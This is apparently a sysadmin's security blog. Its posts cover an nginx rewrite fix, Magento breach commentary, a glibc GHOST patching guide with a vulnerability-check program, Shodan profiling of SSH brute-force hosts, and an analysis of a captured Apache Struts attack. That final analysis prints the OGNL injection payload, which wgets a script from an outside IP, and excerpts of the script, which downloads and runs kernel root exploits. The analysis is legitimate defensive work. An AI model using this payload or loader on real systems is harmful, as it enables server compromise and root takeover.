Yinette's Webshite

A collection of security stuff and all sorts of other random shit.

Word 2010’s Bizzare Take on Urlencodes and How to Fix It in Nginx

I came across a really odd corner case in a customer ticket today, I was unable to find anything related to this problem that involved rewrites, so here it is! My first real kinda non-infosec post. Shoutout to all sysadmins and ops in the world, the struggle is real! <3

The Problem

In Microsoft Word 2010, URLs that have been pasted into a document will hyperlink, however due to a reason I cannot find any reasonable explanation this is what happens:

Example URL:

http://site.com/content#subcontent

What Word passes to the default browser:

http://site.com/content%20-%20subcontent

Yay.

Basically # gets turned into %20-%20.

A desperate search on the intertubes revealed you can actually implement a registry hack to fix this. In this case, that is simply not possible. Word documents with macros that change registry values = malware, idk what it does, it’s doing the WRONG thing.

The Solution

After a good hour making some of the most monstrous regular expressions I think I’ve ever made, I finally started getting somewhere.

rewrite ^(.*)\ -\ (.*)$ $1#$2 redirect;

In the end this rewrite rule was born.

Note! – Nginx will automatically translate the %20 to a space before it hits the rewrite block.

Here it is in action!

curl -v 'http://localhost/index.html%20-%20thingy'

2015/08/26 13:26:58 [notice] 17521#0: *67 "^(.*)\ -\ (.*)$" matches "/index.html - thingy", client: 127.0.0.1, server: localhost, request: "GET /index.html%20-%20thingy HTTP/1.1", host: "localhost"

< HTTP/1.1 302 Moved Temporarily`
< Location: http://localhost/index.html#thingy`

Yay!

Alarming Trends With Recent Magento Breaches

loads a money

Note: Sparse on technical details due to ongoing investigations, this post is just a commentary

As a Systems Administrator, I’ve seen many kinds of web application compromises. From WordPress, to Joomla, to OSCommerce, you name it.

As of recently, a new kind of vulnerability has arisen for the popular Magento ecommerce platform, aptly called “Shoplift”[1] This bug has some serious nastyness that allows for some very bad things to happen to an unpatched site, the exploit itself allows:

  • Authentication Bypass
  • Remote File Inclusion/Remote Code Execution (mostly due to auth bypass)
  • SQL Query Injection

Differences in the usual compromise

This Magento exploit poses a rather different kind of threat than the ususal dime-a-dozen wordpress and joomla sites have, Observing some activity, and indeed corelating with other’s discoveries, (namely Sucuri)[2] I’m noticing something rather different about wild exploitations of shoplift, here’s what I can see and my thoughts on it.

  • Rare that webshells and other specific malicious files are being uploaded.

While i have seen it in this particular exploit in the wild, it does not appear to be anything more than access persistance that is then sold on to do bad things (like spamming)

  • Attackers are attempting to remain low profile.

As with above, noting they’re not leaving traces of their presence that particular anti-virus and web application firewalls can mitigate, they are mostly using parts of the site to their advantage, or are installing innocuous plugins to acheive their goal.

  • Changes to core code are very subtle and ususally try to blend in with the other site functions.

Backdoor access to administrative functions via very slight changes to code have been observed.

  • The focus appears to be that of Customer information and sensitive financial details.

Given the nature of information that a Magento site will see and store, I think it is highly likely this exploit is going to attract the internet’s seedy underbelly of Privacy Theft, Credit Card Fraud, and other very malicious and serious offences, and given what I have seen so far, gives me high confidence of this being the case.

  • A very dedicated core group set to work getting access only days after the details of the exploit were disclosed by the discovering party.

As in the sucuri blog, these two Russian IPs have been very busy.

  • Even after a site is patched, admin credentials belonging to attackers can still be present in a database.

This leads to the next part of this post.

What you need to do as a Magento site maintainer/developer

  • Even if you have applied a patch, audit your administrator logs, and administrator user accounts!

  • If in doubt , it’s probably malicious. Engage a company like sucuri to look for malware and malicious modifications to site code, or completely re-install the core site files.

  • Observe what your customers are saying. If they report that they are receiving emails perporting to be your business asking for credit card details, you got an issue.

In conclusion, a major exploit and very wide-spread attacks were only a matter of time for Magento, as with any popular web application. The implications however are extremely serious, and I would be unsurprised to hear of future major credit card breaches similar to the PoS Malware on Target and other US retail/resturant chains, and the major breaches of sites using unpatched Coldfusion installations.[4]

Keep watching your logs.

References

  1. https://shoplift.byte.nl/ – what is shoplift?
  2. https://blog.sucuri.net/2015/04/magento-shoplift-supee-5344-exploits-in-the-wild.html – Sucuri reporting of exploits in the wild.
  3. http://www.oaic.gov.au/privacy/privacy-resources/privacy-guides/data-breach-notification-a-guide-to-handling-personal-information-security-breaches – Advice (For Australian companies) on how to handle privacy breaches.
  4. http://krebsonsecurity.com/2014/03/the-long-tail-of-coldfusion-fail/ – Details into serious breaches of information on ColdFusion sites used for ecommerce.

GHOST in the Library

Upgrade alone complex – Updating glibc without the pain, misery, and the laughing man

So, there’s a 12 year old bug in glibc, and it allows RCE with permissions of the running process, how wonderful.

Oh yeah, and a simple DNS Lookup can cause it if you use a particular function from the 80’s.

And yes, it’s now our problem.

data

Here’s a link to the write-up provided by Qualys: http://www.openwall.com/lists/oss-security/2015/01/27/9

And here’s a post by Rob at Errata Security called You shouldn’t be using gethostbyname() anyway good advice.

I’m starting to get the hang of these named vulnerabilities, just not the media frenzy that comes after, so, I thought i’d do something about it.

Anyway, time to bring some calm to an otherwise very distressing situation for some sysadmins, and show how you can ensure everything is patched and ok, with MINIMAL downtime.

let’s begin

Check if you are vulnerable!

The people at Qualys who found this bug provided a nice little PoC written in C that you can run to check if your glibc is vulnerable.

Just copypasta the code below into your text editor of choice and save as ‘GHOST.c’ or something along those lines.

#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>

#define CANARY "in_the_coal_mine"

struct {
  char buffer[1024];
  char canary[sizeof(CANARY)];
} temp = { "buffer", CANARY };

int main(void) {
  struct hostent resbuf;
  struct hostent *result;
  int herrno;
  int retval;

  /*** strlen (name) = size_needed - sizeof (*host_addr) - sizeof (*h_addr_ptrs) - 1; ***/
  size_t len = sizeof(temp.buffer) - 16*sizeof(unsigned char) - 2*sizeof(char *) - 1;
  char name[sizeof(temp.buffer)];
  memset(name, '0', len);
  name[len] = '\0';

  retval = gethostbyname_r(name, &resbuf, temp.buffer, sizeof(temp.buffer), &result, &herrno);

  if (strcmp(temp.canary, CANARY) != 0) {
    puts("vulnerable");
    exit(EXIT_SUCCESS);
  }
  if (retval == ERANGE) {
    puts("not vulnerable");
    exit(EXIT_SUCCESS);
  }
  puts("should not happen");
  exit(EXIT_FAILURE);
}

Then, once that’s done do the following:

gcc GHOST.c -o GHOST

Replace GHOST.C with whatever you called the thing above.

Preferrably not as root run your new binary like thus

./GHOST

If you get “Vulnerable” as the return, you need to upgrade, keep following this guide, otherwise, you’re set! But best to check below where i’m trying to find stuff running using older libs.

Upgrade time!

Upgrade your packages, be it with aptitude, apt, pacman, yum or emerge. If your upstream has updated the package, an ‘upgrade all’ should suffice and bring a new glibc into your system.

If you only want to install the new glibc package, there is a way to do it for each package manager, it should be documented or discussed, google will help with update single package <packagemanager> as the query.

Here’s some popular distro advisories and notifications where the packages have been upgraded:

Debian’s Announcement: https://lists.debian.org/debian-security-announce/2015/msg00025.html

Redhat’s Announcement: https://access.redhat.com/articles/1332213

Your init should do a warm restart and pull in the new glibc, this behaviour has been observed on Debian Wheezy with sysvinit

Finding things still running the old glibc

Let’s face it, sometimes we cannot simply restart. Until we reach the nirvana of everything being clustered, we’ll have to live with this.

Here’s a way to find services and processes that are still using the old glibc. For this example, I shall be using a Debian Wheezy machine.

The command is:

sudo lsof -n | grep libc-

output will be something like this:

init          1              root  mem       REG              254,0  1603600    7340685 /lib/x86_64-linux-gnu/libc-2.13.so
udevd       374              root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
rpcbind    1787              root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
rpc.statd  1818             statd  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
rpc.idmap  1832              root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
rsyslogd   2187              root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
rs:main    2187  2192        root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
rsyslogd   2187  2194        root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
rsyslogd   2187  2195        root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
acpid      2240              root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
atd        2259            daemon  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
nmbd       2277              root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
dbus-daem  2311        messagebus  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
smbd       2329              root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
lldpd      2352              root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
lldpd      2354            _lldpd  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
smbd       2372              root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
avahi-dae  2386             avahi  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
avahi-dae  2387             avahi  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
nginx      2484              root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
nginx      2485          www-data  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
nginx      2486          www-data  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
nginx      2487          www-data  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
nginx      2488          www-data  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
libvirtd   2518              root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
libvirtd   2518  2519        root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
libvirtd   2518  2520        root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
libvirtd   2518  2521        root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
libvirtd   2518  2522        root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
libvirtd   2518  2523        root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
libvirtd   2518  2524        root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
libvirtd   2518  2525        root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
libvirtd   2518  2526        root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
libvirtd   2518  2527        root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
libvirtd   2518  2528        root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
cron       2548              root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
dhclient   2582              root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
gmain      2655  2741        root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
gdbus      2655  2836        root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
polkitd    2841              root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
gdbus      2841  2968        root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
exim4      3083       Debian-exim  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
sshd       3108              root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
minissdpd  3133              root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
getty      3143              root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
getty      3144              root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
getty      3145              root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
getty      3146              root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
getty      3147              root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
getty      3148              root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
smbd      11793              root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
udevd     27806              root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
sshd      28095              root  mem       REG              254,0  1603600    7340685 /lib/x86_64-linux-gnu/libc-2.13.so
bash      28100              root  mem       REG              254,0  1603600    7340685 /lib/x86_64-linux-gnu/libc-2.13.so
lsof      28160              root  mem       REG              254,0  1603600    7340685 /lib/x86_64-linux-gnu/libc-2.13.so
grep      28161              root  mem       REG              254,0  1603600    7340685 /lib/x86_64-linux-gnu/libc-2.13.so
lsof      28162              root  mem       REG              254,0  1603600    7340685 /lib/x86_64-linux-gnu/libc-2.13.so
lwresd    28213              root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
lwresd    28213 28214        root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
lwresd    28213 28215        root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
lwresd    28213 28216        root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
lwresd    28213 28217        root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
named     28322              bind  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
named     28322 28323        bind  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
named     28322 28324        bind  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
named     28322 28325        bind  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so
named     28322 28326        bind  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so

Ok, let me point out a few things here off the bat.

init          1              root  mem       REG              254,0  1603600    7340685 /lib/x86_64-linux-gnu/libc-2.13.so

init here is running the updated version of glibc, notice in the third argument after ‘root’ it has ‘mem’? This is a good thing. Its memory-mapped but has an existing file on disk behind it.

However, if we look at libvirtd:

libvirtd   2518  2528        root  DEL       REG              254,0             7340558 /lib/x86_64-linux-gnu/libc-2.13.so

the ‘mem’ is now ‘DEL’, this means its mapped in memory, but the file behind it no longer exists. This is still running a vulnerable glibc.

Update!

A follower of mine @aptcat noticed something different with their lsof output with a 32-bit kernel:

syslogd    1435               root  mem       REG              253,3            74591600 (deleted)/lib/i386-linux-gnu/libc-2.13.so (stat: No such file or directory)

You will note that lsof still has it in memory, but notes the file itself is deleted.

Thanks for that @aptcat!

The solution? Restart services!

You can get some easy wins with daemons like sshd, libvirtd, postfix/exim4, etc since they can restart without showing any major visible disruption. Nginx/apache is in the list of these, but it depends on how much config it has to parse and how much traffic you get at any one moment.

Other services like mysqld, redis, etc that will either kill important data or take a noticible time to start up again might need to be scheduled in with your user for when an appropriate time to restart these is.

I would still highly recommend a full reboot anyway, as this will ensure everything comes back with a fresh glibc, and you wont get nasty surprises.

Using sysvinit, the way to restart these as root/sudo is as follows:

sudo service THING restart

Though, note that some things have themselves named differently than you would think. For example sshd under debian sysvinit is ‘ssh’ under the service control script, use tab-complete (mash TAB) if you are unsure. (Likewise with apache2 on RHEL/Centos, it can sometimes be httpd)

Systemd users will be able to use sudo systemctl THING restart, however i’d imagine systems that use systemd would have already patched glibc… Oh well, might be different for everyone.

After that, assuming the service has restarted without issue and everything looks peachy, the ‘DEL’ should change to ‘mem’.

Now it’s just a matter of hunting down other services or programs to restart.

Here’s a quick one getting a list of processes and also looking for ‘DEL’

sudo lsof -n | grep libc- | grep DEL

That should be it.

If you have any suggestions on how to do any of this better, please don’t hesitate to mention me on twitter (@yinettesys), I will RT and converse with those who provide much better methodology than mine.

Now, let’s hope the media scrum isn’t as large as it has been in the past.

Using Shodan to Find Similarities Between Hosts in SSH Brute Force Ranges

So, I was messing with shodan this morning after reading Cybergibbon’s shenanigans with the Heatmiser Wifi Thermostat, and reviewing the IDS and firewall logs as i do each morning.

I wanted to see how much traffic the router had blocked from a particular range that likes to attack all the open SSH stuff on this particular network:

 292K   12M DROP       all  --  *      *       61.174.51.0/24       0.0.0.0/0

heh neat. 12M of TCP ‘SYN’ over about two weeks.

Then with shodan fresh in the mind, I got an idea.

Preamble

banhammer

For those who don’t know, the range of 61.147.51.0/24 is a range inside China that constantly attacks the reachable internet for weak SSH credentials, all day, every day. If you watch the Norse attack map, you might see it doing its thing.

There are other ranges within China that exhibit the same behaviour, namely 144.0.0.0/24 and 116.10.191.0/24, but as a whole the entire 61.147.0.0/16 range is bad news. Never seen legit traffic from this range ever.

Sure SSH scans happen, it’s the internet, and we have a password policy that mandates passwords cannot be guessable by any 3 year old. However, whoever is behind this is putting a fair amount of trouble and resources into doing this, it’s rather insane.

Well so am I, so lets fuck with them.

Release the shodan!

So, shodan is awesome. It’s a search engine for random stuff open to the internet. You can find a lot of fun, sadness and potentially a lot of trouble if you look for the right (or wrong) thing and play with it.

Shodan is perfect for this research project, since I don’t have to waste my oh so valuable resources to compile and run masscan (oh noes muh cycles!) or money to do it from a throw-away cloud shitbox. But more seriously, why risk being scanned back (or DDoS’d) for performing reconnaissance? or being banhammered from AWS, Google Cloud, or OVH for doing naughty things?

Shodan can take that risk for you if you don’t want to. I’d be more than happy to do it all myself (I am certainly capable of doing so), but that’s not in scope of this post :)

So, Shodan has an API, cool. I’m a Sysadmin, give me a python library, Oh look they have one

I fired up my python virtualenv, ran vim and got to work.

The result was an awful script that did awful things:

#!env /bin/python

import shodan

SUPER_SECRET_API_KEY = "LOL NOPE"

api = shodan.Shodan(SUPER_SECRET_API_KEY)

naughty_pricks = [
        "61.174.51.45",
        "61.174.51.198",
        "61.174.51.202",
        "61.174.51.235",
        "61.174.51.231",
        "61.174.51.230",
        "61.174.51.204",
        "61.174.51.216",
        "61.174.51.201",
        "61.174.51.232",
        "61.174.51.227",
        "61.174.51.208",
        "61.174.51.228",
        "61.174.51.226",
        "61.174.51.209",
        "61.174.51.225",
        "61.174.51.217",
        "61.174.51.195",
        "61.174.51.212",
        "61.174.51.234",
        "61.174.51.214",
        "61.174.51.207",
        "61.174.51.196",
        "61.174.51.211",
        "61.174.51.200",
        "61.174.51.218",
        "61.174.51.205",
        "61.174.51.215",
        "61.174.51.197",
        "61.174.51.229",
        "61.174.51.213",
        "61.174.51.199",
        "61.174.51.221",
        "61.174.51.233",
        "61.174.51.224",
        "61.174.51.194",
        "61.174.51.203",
        "61.174.51.223",
        "61.174.51.210",
        "61.174.51.222",
        "61.174.51.219",
        "61.174.51.206",
        "61.174.51.220",
]

for prick in naughty_pricks:

        host = api.host(prick)

#I know this looks bad and I should feel bad. but idgaf call the cops.

        print """
---------------------------------------

IP:  ***%s***

ISP: ***%s***
        """ % (host['ip_str'], host.get('org', 'n/a'))

        for item in host['data']:
                print """
Port: ***%s***

Banner:

    %s
""" % (item['port'], item['data'])

The result was this semi readable markdown output

from here, i could then grep and mould the results as i saw fit.

The analysis

Since the hosts all had Port 137 open (NetBIOS), this gave me some information that i found useful for profiling our friends.

A grep for hostnames gave me a nice tight list of all the hostnames of these systems:

IDC-073C1DF8683 <0x20>
IDC-1D5C6BBDF3A <0x20>
IDC-1D6EF802E40 <0x20>
IDC-1DCEB780E28 <0x20>
IDC-22D7C9E2B02 <0x20>
IDC-2533F122B13 <0x20>
IDC-26A1C33F316 <0x20>
IDC-7213F7E9432 <0x20>
IDC-85365D05ADF <0x20>
IDC-8DDE4A14FF8 <0x20>
IDC-996DA0223DD <0x20>
IDC-A80C6B30775 <0x20>
IDC-CECC265ED8B <0x20>
IDC-D94F7772A93 <0x20>
IDC-DC2D985494C <0x20>
IDC-EAE1FBD4E07 <0x20>
IDC-FB92254677F <0x20>
ORGANIZA-D00C80 <0x20>
TENGYI-163CAAB8 <0x20>
TENGYI-1A7B7025 <0x20>
TENGYI-56AB5E32 <0x20>
TENGYI-75574DC7 <0x20>
TENGYI-D1DEECDA <0x20>
TENGYI-EA32E16E <0x20>
WWW-0C90D5E834F <0x20>
WWW-10B06E72287 <0x20>
WWW-17385A1E7D9 <0x20>
WWW-1F45ED6876A <0x20>
WWW-357C3D5BA92 <0x20>
WWW-3E63653E8D7 <0x20>
WWW-69EB0C42237 <0x20>
WWW-6DCC428E422 <0x20>
WWW-7370E8EC3E0 <0x20>
WWW-83CE25E3961 <0x20>
WWW-890860C26E3 <0x20>
WWW-8D870A2DAE6 <0x20>
WWW-8FACE61F8D1 <0x20>
WWW-C0F7DF227B2 <0x20>
WWW-C8ABBE387A2 <0x20>
WWW-CB73E270F45 <0x20>
WWW-D7BB30955E9 <0x20>
WWW-E099932AEE8 <0x20>

I asked about if the IDC- and prefixes meant anything on twitter earlier today, but the only thing i could get from it was it’s possibly a GUID, truncated due to NetBIOS 15 chr limit on hostname values.

The IDC- prefixed hostname is not uniqe to these machines, infact using shodan I was able to find similar instances from other countries too, but the bulk are in China and the US, same with the WWW- prefix, just more Chinese hits.

From what I can find around the intertubes, ‘TENGYI’ or Teng Yi is a name given to males in China, so probably some dude’s name.

The only one that stands out is ORGANIZA at IP 61.174.51.232 which is spanish for “organized”, I think it’s generic. Might mean something to someone. As far as the other hosts go, this one was run of the mill, only Port 137 is open.

Running Services

Doing a quick count, the following was discovered:

43 have port 137 (NetBIOS) open (all of them) with each on the default WORKGROUP workgroup.

32 have port 21 (FTP) open with either Serv-U or Filezilla-Server as the ftpd

1 has port 22 (SSH) open with the opening string SSH-1.99-OpenSSH_3.9p1

1 has port 443 (SSL) open, was unable to obtain certificate because the port is now closed.

1 has port 445 (MS-RPC) open that had a semi-successful Anonymous login when shodan did a pass:

Anonymous login successful

    Sharename       Type      Comment
    ---------       ----      -------
Error returning browse list: NT_STATUS_ACCESS_DENIED
session request to 61.174.51.213 failed (Called name not present)
session request to 61 failed (Called name not present)
Anonymous login successful

    Server               Comment
    ---------            -------

    Workgroup            Master
    ---------            -------

3 have port 5432 (PostgreSQL) open, all of which responded with could not create socket: Too many open files lol

1 had port 80 (HTTP) open, responded with a HTTP 400 with no server header when shodan queried it.

2 had port 9200 open, running apache httpd, returned HTTP 403 and had the server header Server: Apache/1.3.33 (Unix) mod_ssl/2.8.22 OpenSSL/0.9.6m That’s too old for Heartbleed btw, but all sorts of other shit lurks within versions that old.

Layer 2 Intelligence

Some of the NetBIOS responses contained the machine’s NIC MAC Address, here’s a list of them:

MAC: 00:19:bb:39:2e:5e
MAC: 00:19:bb:3d:e3:90
MAC: 00:19:bb:3e:cd:90
MAC: 00:1a:4b:a4:fc:ac
MAC: 00:1a:4b:a5:34:1a
MAC: 00:1b:78:72:78:48
MAC: 00:1b:78:73:97:82
MAC: 00:1b:78:75:24:46
MAC: 00:1b:78:76:dd:5e
MAC: 00:1b:78:ca:4e:8a
MAC: 00:1c:c4:78:fb:84
MAC: 00:1e:0b:47:2a:fc
MAC: 00:1e:0b:5e:1d:7a
MAC: 00:1e:0b:5f:3a:54
MAC: 00:1e:0b:5f:3f:ec
MAC: 00:1e:0b:5f:5e:fa
MAC: 00:1e:0b:8f:c0:08
MAC: 00:1e:67:13:c7:1e
MAC: 00:1e:67:25:ee:76
MAC: 00:1e:67:66:b0:be
MAC: 00:1e:c9:b6:ce:44
MAC: 00:1f:29:0a:f5:f6
MAC: 00:1f:29:64:a9:46
MAC: 00:1f:29:ca:a6:fe
MAC: 00:21:5a:45:6c:6a
MAC: 00:22:19:51:97:e7
MAC: 00:22:19:51:ad:4a
MAC: 00:22:19:ba:89:bd
MAC: 00:24:e8:54:29:32
MAC: 00:24:e8:5a:91:66
MAC: 00:24:e8:5a:91:81
MAC: 00:24:e8:5a:9f:aa
MAC: 00:24:e8:5a:b3:1d
MAC: 00:24:e8:5a:b3:28
MAC: 08:60:6e:57:29:e7
MAC: 68:b5:99:b4:04:86
MAC: bc:5f:f4:91:ee:51
MAC: bc:5f:f4:91:ee:d8
MAC: bc:5f:f4:91:ee:ea
MAC: c8:60:00:83:be:1a
MAC: d4:85:64:53:51:dc
MAC: d4:85:64:53:dc:40

From here, we can cut out only the first three bytes of the MAC to give us the Manufacturer uniq part, and feed that through a database:

00:19:bb - Hewlett Packard
00:1a:4b - Hewlett Packard
00:1b:78 - Hewlett Packard
00:1c:c4 - Hewlett Packard
00:1e:0b - Hewlett Packard
00:1e:67 - Intel
00:1e:c9 - Dell
00:1f:29 - Hewlett Packard
00:21:5a - Hewlett Packard
00:22:19 - Dell
00:24:e8 - Dell
08:60:6e - ASUSTek Computer
68:b5:99 - Hewlett Packard
bc:5f:f4 - ASRock
c8:60:00 - ASUSTek Computer
d4:85:64 - Hewlett Packard

Interesting mix, but one very obvious favorite in this list.

Observations

Most of the hosts presented as Windows boxes running a ftpd, however some also showed signs of running *NIX applications like apache, SSH and Possibly PostgreSQL,

some possibilities come of this:

  • The IP in question is actually a Gateway for a bunch of machines running behind a NAT
  • The IPs are windows machines running Virtual machines (they seem kinda old), or running cygwin/mingw.
  • I don’t know. Anything could be happening.

Conclusions

Its hard to tell if these are just compromised, or if there is any organisation behind them. My suspicious mind likes to think the latter.

Unless someone jumps the gun, pops a few of these boxes and unravels the secrets they hold, I don’t think we’ll ever know. Oh well. They’re banhammered. whatever.

Thanks!

It All Began With a Struts Exploit Attempt. Part 1

This post, and the following posts in this series is a Joint Operation with myself and @MalwareMustDie, check out his stuff http://malwaremustdie.blogspot.com.au Malware Must Die!

Where I work, my IDS is witness to hundreds and thousands of attacks upon the network daily. Every once in a while, something will pop up that will catch my interest… This was one of those.

[1:2017173:4] ET EXPLOIT Apache Struts Possible OGNL Java ProcessBuilder in client body

Quick Sidenote: The server they tried this against had been patched for this exploit

I have seen Struts exploits before, but this one stood out as interesting as these attacks are not that common compared to PHP-based attacks that pull down IRCBots written in Perl.

Content-Length: 515
Expect: 100-continue
POST / HTTP/1.1
User-Agent: Mozilla/5.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: xxxxxxxxxxxxxxx
Content-Length: 515
Expect: 100-continue
redirect:${#res=#context.get(com.opensymphony.xwork2.dispatcher.HttpServletResponse),#res.setCharacterEncoding("UTF-8"),#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"wget","http://61.147.103.21:8080/run.sh"})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[20000],#d.read(#e),#res.getWriter().println(#e),#res.getWriter().flush(),#res.getWriter().close()}

Why hello there!

the fun part we get in that is:

{"wget","http://61.147.103.21:8080/run.sh"}

DON’T MIND IF I DO

wget

Its the Shellscript that never ends…

8484ddd6282dc0b90d4e903866dc1526 run.sh

This is a massive script…. (View it in full here: https://gist.github.com/anonymous/c947a9c3109a5fe353e8)

#!/bin/bash

fcheckr00t()
{
    echo " [*] Downloading exploit No. $CNT.."
    if [ $(whoami) = 'root' ] 2> /dev/null
    then
        echo " [*] g0tr00t with exploit No. $CNT"
        GOTROOT=1
    else
        echo " [*] Failed to g0tr00t with exploit No. $CNT"
        CNT=$((CNT + 1))
    fi
}

fcheckdep()
{
    if [ $(which wget) -z ] 2> /dev/null
    then
        if [ $(which curl) -z ] 2> /dev/null
        then 
            echo ' [*] No downloaders found, try self-contained version..'
            exit
        else
            DLER='curl -s -o .profild.key'
            CURLIT=1
        fi
    else
        DLER='wget -q'
        CURLIT=''
    fi
}


fcheckdep
CNT=1
GOTROOT=''
mkdir exploits
cd exploits

if [ $GOTROOT -z ] 2> /dev/null
then
    $DLER http://www.pingyan-china.com:8080/1-2
    if [ $CURLIT -z ] 2> /dev/null
    then
        chmod 777 1-2
        ./1-2
    else
        chmod 777 .profild.key
        ./.profild.key
    fi
    fcheckr00t
fi

if [ $GOTROOT -z ] 2> /dev/null
then
    $DLER http://www.pingyan-china.com:8080/1-3
    if [ $CURLIT -z ] 2> /dev/null
    then
        chmod 777 1-3
        ./1-3
    else
        chmod 777 .profild.key
        ./.profild.key
    fi
    fcheckr00t
fi

if [ $GOTROOT -z ] 2> /dev/null
then
    $DLER http://www.pingyan-china.com:8080/1-4
    if [ $CURLIT -z ] 2> /dev/null
    then
        chmod 777 1-4
        ./1-4
    else
        chmod 777 .profild.key
        ./.profild.key
    fi
    fcheckr00t
fi

if [ $GOTROOT -z ] 2> /dev/null
then
    $DLER http://www.pingyan-china.com:8080/2.6.18-374.12.1.el5-2012
    if [ $CURLIT -z ] 2> /dev/null
    then
        chmod 777 2.6.18-374.12.1.el5-2012
        ./2.6.18-374.12.1.el5-2012
    else
        chmod 777 .profild.key
        ./.profild.key
    fi
    fcheckr00t
fi

------ SNIP --------

This thing is massive….

    $ wc -l run.sh
    1721 run.sh

    $ ls -alh run.sh
    -rw-r----- 1 xxxxxx xxxxxx 29K Sep  2 18:55 run.sh

This is systematically trying each kernel exploit present on the webserver.

------ SNIP --------

if [ $GOTROOT -z ] 2> /dev/null
then
    $DLER 'http://www.pingyan-china.com:8080/Linux_2.6(1).12'
    if [ $CURLIT -z ] 2> /dev/null
    then
        chmod 777 Linux_2.6\(1\).12
        ./Linux_2.6\(1\).12
    else
        chmod 777 .profild.key
        ./.profild.key
    fi
    fcheckr00t
fi

if [ $GOTROOT -z ] 2> /dev/null
then
    $DLER http://www.pingyan-china.com:8080/Linux_2.6.12
    if [ $CURLIT -z ] 2> /dev/null
    then
        chmod 777 Linux_2.6.12
        ./Linux_2.6.12
    else
        chmod 777 .profild.key
        ./.profild.key
    fi
    fcheckr00t
fi

if [ $GOTROOT -z ] 2> /dev/null
then
    $DLER http://www.pingyan-china.com:8080/vmsplice-local-root-exploit
    if [ $CURLIT -z ] 2> /dev/null
    then
        chmod 777 vmsplice-local-root-exploit
        ./vmsplice-local-root-exploit
    else
        chmod 777 .profild.key
        ./.profild.key
    fi
